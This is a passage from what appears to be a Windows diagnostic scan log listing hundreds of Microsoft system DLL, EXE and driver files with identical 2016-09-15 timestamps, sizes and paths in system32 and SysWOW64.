2016-09-15 05:01 - 2016-09-15 05:01 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00885824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00853344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00820736 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00807776 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00790760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00781824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00773200 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00755656 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00726016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00714240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00681304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00665768 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00658272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00650240 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00601200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00595488 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00590952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00587968 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00552288 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00544768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00536576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00526848 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00523712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00509952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00491520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00466432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00461312 _____ (Microsoft) C:\WINDOWS\SysWOW64\DbgModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00450392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosResource.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MosResource.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00408600 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00405344 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00389000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00382272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\NmaDirect.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00361096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00340832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\container.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Phoneutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00313560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00303968 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00302592 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00297552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wevtapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00289280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NmaDirect.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincorlib.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00282624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00263680 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00260096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Phoneutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00248320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_G18030.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\container.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00225280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\C_G18030.DLL 2016-09-15 05:01 - 2016-09-15 05:01 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00224096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00204288 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 